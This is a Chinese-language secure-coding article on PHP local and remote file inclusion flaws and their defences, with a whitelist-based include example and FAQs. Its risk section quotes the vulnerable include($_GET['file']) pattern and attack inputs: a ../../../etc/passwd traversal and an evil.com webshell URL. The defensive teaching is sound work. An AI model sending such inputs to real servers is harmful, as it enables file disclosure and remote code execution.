文件包含是软件开发中提升代码复用性的常用手段,通过动态加载文件实现模块化功能,若处理不当,文件包含操作可能成为安全漏洞的入口,导致敏感信息泄露、服务器被控等严重风险,理解文件包含的安全风险并掌握防护策略,是保障应用安全的重要环节。

文件包含漏洞的核心风险
文件包含漏洞主要分为本地文件包含(LFI)和远程文件包含(RFI)两类,LFI允许攻击者通过恶意输入读取服务器本地敏感文件,如配置文件(/etc/passwd)、数据库凭证(config.php)或会话文件,进而获取系统权限;RFI则可包含远程服务器上的恶意脚本(如Webshell),直接实现代码执行,危害性更大,这类漏洞通常源于开发者直接使用用户输入构建文件路径,未对输入进行严格过滤,例如代码中存在include($_GET['file']),攻击者可通过传入../../../etc/passwd或http://evil.com/shell.php发起攻击。
安全防护的五大关键策略
输入验证与过滤
对用户输入进行严格校验,拒绝包含路径遍历字符(如、)、协议标识(如http://、php://)的输入,使用正则表达式限制输入仅允许字母、数字及下划线,或对输入进行编码处理,阻断恶意路径构造。
白名单机制优先
摒弃黑名单过滤(易被绕过),采用白名单策略,预定义允许包含的文件列表(如header.php、footer.php),仅当用户输入匹配白名单时才执行包含操作,PHP中可通过in_array($file, $allowed_files)验证合法性。
路径隔离与限制
将包含文件存放于独立目录(如/includes/),并禁止访问上级目录(通过dirname(__FILE__)获取当前文件路径,拼接白名单文件名),在服务器配置中设置open_basedir,限制文件访问范围,避免越界读取。

配置加固
关闭远程文件包含功能(PHP中设置allow_url_include=Off),避免攻击者通过远程URL加载恶意文件,启用错误日志隐藏(display_errors=Off),防止因文件包含失败暴露服务器路径信息。
权限最小化
对包含文件设置严格的文件权限(如600或644),确保Web用户仅具备读取权限,避免敏感文件被篡改或泄露,数据库配置等核心文件应存放于Web根目录之外,降低直接访问风险。
代码实践示例
以下为PHP安全包含文件的代码片段:
// 定义允许包含的文件白名单
$allowed_files = ['header.php', 'footer.php', 'config.php'];
// 获取用户输入(如通过GET参数的file)
$file = $_GET['file'] ?? '';
// 检查输入是否在白名单中,并限制在includes目录
if (in_array($file, $allowed_files)) {
$safe_path = './includes/' . $file;
include_once $safe_path;
} else {
die('非法文件请求');
}
安全包含文件的核心在于“控制输入、限制路径、最小权限”,通过输入验证、白名单机制、路径隔离等策略,可有效防范文件包含漏洞,开发者需将安全编码融入开发流程,定期进行代码审计,确保文件操作始终在可控范围内,从源头降低安全风险。

FAQs
-
问:为什么用黑名单过滤文件包含漏洞不可靠?
答:黑名单难以覆盖所有绕过方式(如路径编码、特殊字符拼接),攻击者可能利用未列入黑名单的文件类型(如.php5)或协议伪缀(如php://filter)绕过限制,而白名单明确允许范围,从根本上杜绝非法文件。 -
问:如何快速排查项目中是否存在文件包含风险?
答:扫描代码中所有动态文件包含函数(如include、require),检查其参数是否直接来自用户输入(GET/POST/COOKIE);若未经过白名单验证或路径限制,则存在风险,检查服务器配置是否允许远程文件包含(allow_url_include状态)。
原创文章,发布者:酷番叔,转转请注明出处:https://cloud.kd.cn/ask/51825.html